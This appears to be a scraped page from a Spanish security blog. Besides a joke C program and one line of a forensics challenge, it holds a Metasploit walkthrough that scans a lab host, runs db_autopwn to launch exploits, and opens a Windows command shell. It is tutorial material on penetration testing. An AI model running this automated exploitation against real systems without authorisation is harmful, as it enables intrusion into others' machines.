#include "yearday.h"
YearDay iDay = 0; /* tipo de dato YearDay, sin signo de 0 a 365, evidentemente :P */
int main()
{
while (1)
{
iDay++;
if ( iDay == 0 )
printf("Feliz Año!\n");
}
return 0;
}
Pues eso, que Feliz Año Nuevo!! :P
Seguridad de Sistemas Informáticos
#include "yearday.h"
YearDay iDay = 0; /* tipo de dato YearDay, sin signo de 0 a 365, evidentemente :P */
int main()
{
while (1)
{
iDay++;
if ( iDay == 0 )
printf("Feliz Año!\n");
}
return 0;
}
Tú eres el investigador forense. Tu misión es averiguar donde se ha ido Ann y la máxima información posible contenida en la captura de red que pueda ayudar a la investigación.
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
back Move back from the current context
[...]
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database
db_create Create a brand new database
db_destroy Drop an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver
aptitude install sqlite3 libsqlite3-ruby libdbd-sqlite3-ruby libopenssl-ruby nmap
msf > db_driver
[*] Active Driver: sqlite3
[*] Available: sqlite3, mysql
msf > db_driver mysql
[*] Using database driver mysql
msf > db_create pentester.es
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: pentester.es
msf > db_connect pentester.es
[*] Successfully connected to the database
[*] File: pentester.es
msf > db_nmap -n -sT -PN 192.168.2.2
[*] exec: "/usr/bin/nmap" "-n" "-sT" "-PN" "192.168.2.2" "-oX" "/tmp/dbnmap20091018-3147-2qv7ko-0"
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-10-18 22:50 CEST
NMAP: Interesting ports on 192.168.2.2:
NMAP: Not shown: 1709 closed ports
NMAP: PORT STATE SERVICE
NMAP: 53/tcp open domain
NMAP: 80/tcp open http
NMAP: 139/tcp open netbios-ssn
NMAP: 389/tcp open ldap
NMAP: 445/tcp open microsoft-ds
NMAP: 8080/tcp open http-proxy
NMAP:
NMAP: Nmap done: 1 IP address (1 host up) scanned in 2.232 seconds
msf > db_hosts
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Host: 192.168.2.2 Status: alive OS:
msf > db_services
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=53 proto=tcp state=up name=domain
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=80 proto=tcp state=up name=http
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=139 proto=tcp state=up name=netbios-ssn
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=389 proto=tcp state=up name=ldap
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=8080 proto=tcp state=up name=http-proxy
> db_autopwn -t -p -e
[*] Analysis completed in 8.36183190345764 seconds (0 vulns / 0 refs)
[*] Matched exploit/unix/webapp/guestbook_ssi_exec against 192.168.2.2:80...
[*] (1/142): Launching exploit/unix/webapp/guestbook_ssi_exec against 192.168.2.2:80...
[*] Matched exploit/windows/http/savant_31_overflow against 192.168.2.2:80...
[*] (2/142): Launching exploit/w [...]
msf > sessions -l
Active sessions ===============
Id Description Tunnel – ———– —— 1 Command shell 192.168.2.3 -> 192.168.2.2
msf > sessions -i 1 [*] Starting interaction with 1…
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
msf > db_nmap -p 445,139 -PN -sS -n 192.168.2.0/24